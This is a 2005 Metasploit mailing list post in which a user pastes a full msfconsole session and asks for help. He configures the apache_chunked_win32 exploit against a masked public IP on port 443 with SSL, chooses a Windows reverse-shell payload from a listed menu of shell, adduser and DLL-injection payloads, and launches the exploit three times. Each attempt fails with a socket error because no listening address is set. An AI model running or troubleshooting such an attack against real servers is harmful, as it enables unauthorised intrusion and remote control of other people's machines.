Metasploit mailing list archives

re: Apache Exploit : Errors

From: cesedo at (Cyril Esedo)
Date: Tue, 26 Apr 2005 11:59:17 -0700


hi HD,

thanks for your prompt reply, i have included the whole snapshot of what i did to this mail, where did i go wrong?

??????????????? __.?????????????????????? .__.??????? .__. __.
? _____?? _____/? |______??? ____________ |? |?? ____ |__|/? |_
?/???? \_/ __ \?? __\__? \? /? ___/\____ \|? |? /? _ \|? \?? __\
|? Y Y? \? ___/|? |? / __ \_\___ \ |? |_> >? |_(? <_> )? ||? |
|__|_|? /\___? >__| (____? /____? >|?? __/|____/\____/|__||__|
????? \/???? \/????????? \/???? \/ |__| 

+ -- --=[ msfconsole v2.3 [46 exploits - 68 payloads] 

msf > use aqpache_chunked_win32
msfconsole: use: please specify a valid exploit name
msf > use apache_chunked_win32
msf apache_chunked_win32 > show options 

Exploit Options

? Exploit:??? Name????? Default??? Description
? --------??? ------??? -------??? ------------------
? optional??? SSL????????????????? Use SSL
? required??? RHOST??????????????? The target address
? required??? RPORT???? 80???????? The target port 

? Target: Windows NT/2K Bruteforce 

msf apache_chunked_win32 > set RPORT 443
RPORT -> 443
msf apache_chunked_win32 > set RHOST 80.x.x.x
RHOST -> 80.x.x.x
msf apache_chunked_win32 > set SSL 1
SSL -> 1
msf apache_chunked_win32 > show options 

Exploit Options

? Exploit:??? Name????? Default???????? Description
? --------??? ------??? ------------??? ------------------
? optional??? SSL?????? 1?????????????? Use SSL
? required??? RHOST???? 80.x.x.x??? The target address
? required??? RPORT???? 443???????????? The target port 

? Target: Windows NT/2K Bruteforce 

msf apache_chunked_win32 > show targets 

Supported Exploit Targets

?? 0? Windows NT/2K Bruteforce
?? 1? Windows 2000
?? 2? Windows NT 

msf apache_chunked_win32 > set TARGET 2
msf apache_chunked_win32 > show payloads 

Metasploit Framework Usable Payloads

? win32_adduser??????????????? Windows Execute net user /ADD
? win32_bind?????????????????? Windows Bind Shell
? win32_bind_dllinject???????? Windows Bind DLL Inject
? win32_bind_meterpreter?????? Windows Bind Meterpreter DLL Inject
? win32_bind_stg?????????????? Windows Staged Bind Shell
? win32_bind_stg_upexec??????? Windows Staged Bind Upload/Execute
? win32_bind_vncinject???????? Windows Bind VNC Server DLL Inject
? win32_exec?????????????????? Windows Execute Command
? win32_reverse??????????????? Windows Reverse Shell
? win32_reverse_dllinject????? Windows Reverse DLL Inject
? win32_reverse_meterpreter??? Windows Reverse Meterpreter DLL Inject
? win32_reverse_stg??????????? Windows Staged Reverse Shell
? win32_reverse_stg_upexec???? Windows Staged Reverse Upload/Execute
? win32_reverse_vncinject????? Windows Reverse VNC Server Inject 

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) > show options 

Exploit and Payload Options

? Exploit:??? Name????? Default???????? Description
? --------??? ------??? ------------??? ------------------
? optional??? SSL?????? 1?????????????? Use SSL
? required??? RHOST???? 80.x.x.x?? The target address
? required??? RPORT???? 443???????????? The target port 

? Payload:??? Name??????? Default??? Description
? --------??? --------??? -------??? ------------------------------------------ 

? required??? EXITFUNC??? seh??????? Exit technique: "process", "thread", "seh"
? required??? LHOST????????????????? Local address to receive connection
? required??? LPORT?????? 4321?????? Local port to receive connection 

? Target: Windows NT 

msf apache_chunked_win32(win32_reverse) > set LHOST
msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x
[*] Starting Reverse Handler.
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler. 

msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x
[*] Starting Reverse Handler.
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler. 

msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x
[*] Starting Reverse Handler.
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler. 

msf apache_chunked_win32(win32_reverse) >

thanks - C

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